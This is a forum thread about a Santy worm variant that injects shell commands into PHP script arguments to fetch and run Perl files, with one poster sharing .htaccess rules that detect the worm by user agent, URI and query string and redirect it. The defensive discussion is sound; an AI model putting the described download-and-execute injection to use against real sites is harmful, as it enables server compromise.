Be Advised! New Santy Strain Attacks All PHP Web Scripts!

[Vin DSL]

Folks, it seems that Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, but it looks for any PHP scripts with all possible arguments passed thru in the HTTP GET. This worm tries all arguments in your PHP script to throw in a shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl...

SOURCE: http://castlecops.com/article-5640-nested-0-0.html (Full Story)

[Oldfrog]

Yeah, I have been watching Paul fight it in one of the staff forums there. I have not wanted to disturb him while busy but have a couple of questions:

1) Okay, I am fully upgraded to phpbb2.0.11 so am I still vulnerable?

2) Paul has some seclists to http://modsecurity.org/ that seem to be holding the line. I am thinking that this can only be applied at the server level. If I am wrong and it can be implemented on a hosted site I would gladly go for it. Can it?

[Ron]

<snif> I miss being able to see the admin forums here <snif>

[Vin DSL]

Okay...

I've been working on this most of the night. I poured over a 295MB log file for hours (thank God for my Intel P4). I examined 100's of Santy worm attacks against my web site, yada, yada...

Basically, I've been hit by three variants. Some contain a common UA. Some contain a common URI. Many share a common string. So, for now, I'm using this quick 'n' dirty solution.

I've added the following directives to .htaccess

Code:

#Send Santy worm variant #1 packing
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$ emailsforyou.php [L]

#Send Santy worm variant #2 packing
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteRule ^.*$ emailsforyou.php [L]

#Send Santy worm variant #3 packing
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ emailsforyou.php [L]

Of course, you can send the worms 'packing' to any place you want. Personally, I send them to a script on my web site that generates 100 bogus, random, email addies.

http://www.lenon.com/emailsforyou.php


P.S. Hey, Jag, if you happen to read this, check out ticket #2097291. It's a classic...

[Spathiphyllum]

So does the exploit also have an email harvesting component? I could understand sabotaging their list if that is the goal, but is there any other purpose in creating a randomizing false email lister? Wouldn't that just create even more unnecessary traffic if one is getting bombarded by numerous worm GETs? Mind you, I use a mine here and there to sabotage misbehaving robots too, but the rogues are so few and far between that it doesn't create excessive false link tracking - it just makes a nice page for the robots to get themselves in deeper trouble.

[Vin DSL]

So does the exploit also have an email harvesting component?

No, that's not the reason I did that...

There is going to be some collateral damage from those directives. The LWP::Simple Perl module is extremely common on the net, but what's a guy to do?

I figured, if some innocent person gets directed to that page, at least the text will incidcate it was because of their UA.

[Vin DSL]

Wouldn't that just create even more unnecessary traffic if one is getting bombarded by numerous worm GETs?

Oh, another thing...

I've noticed these worms give it one shot, for the most part, then they're gone. So...

You got a better idea?

[Spathiphyllum]

I've noticed these worms give it one shot, for the most part, then they're gone. So...

You got a better idea?

Well if it stops them from returning, then I'd call it an effective response.

Nah, no better ideas from my end. That you and Ron have put something together is valuable in its own right. I was just wondering if there was some email harvesting going on in addition to searching for more nodes of infection.

I guess if I was using phpBB, I might be a little more inclined to find a solution to annoy the crackers. Besides, I have enough fires to put out... who needs more work?

[Vin DSL]

I guess if I was using phpBB, I might be a little more inclined to find a solution to annoy the crackers...

I don't mean to nit-pick you, bro, but the point of this thread is Santy variants are now going after ALL .PHP scripts, not just phpBB. phpBB exploits are 'old school' now. That was last month...

The new Santy variants are mostly attacking my 'Legal Documents' script, e.g. my disclaimers, and also my Download module, not phpBB.

[Spathiphyllum]

I don't mean to nit-pick you, bro,...

Duly noted.

..but the point of this thread is Santy variants are now going after ALL .PHP scripts, not just phpBB. phpBB exploits are 'old school' now. That was last month...

The new Santy variants are mostly attacking my 'Legal Documents' script, e.g. my disclaimers, and also my Download module, not phpBB.

OK, ahem, Your Honor... I'd like to amend my response:

"I guess if I was using *.php, I might be a little more inclined to find a solution to annoy the ****ards. Besides, I have enough fires to put out... who needs more work?"

[Vin DSL]

That's more like it...

Hey, is Christmas over? Can I quit drinking this damn Michelob Ultra?

[Spathiphyllum]

Christmas may be over but it's pre-New Year's Eve week. I'd advise slipping into some spirits of Southern Comfort to build up one's tolerance for NYEve proper instead.

Anyway, what's the difference between old-n-lousy Michelob and new-n-improved Ultra? Caffeine? Label? Caramel coloring? Preservative?

[Vin DSL]

Anyway, what's the difference between old-n-lousy Michelob and new-n-improved Ultra? Caffeine? Label? Caramel coloring? Preservative?

I just bought this crap 'cause I had relatives over. I bought 'The Rock' for myself, but that's what everyone ended up drinking. ***ards!!! So, now I'm stuck with 18 bottles of 'near beer.'

"18 bottles of beer on the wall, 18 bottles of beer..."

[Spathiphyllum]

Just a suggestion - mix it with some water and feed your plants. The soil loves the yeast and the plants will like the boost. Add a little sugar/molasses to the mix and the microbes go nuts - just keep it off the leaves.

[Vin DSL]

I think I'll save it for next Christmas. Maybe it'll be good by then!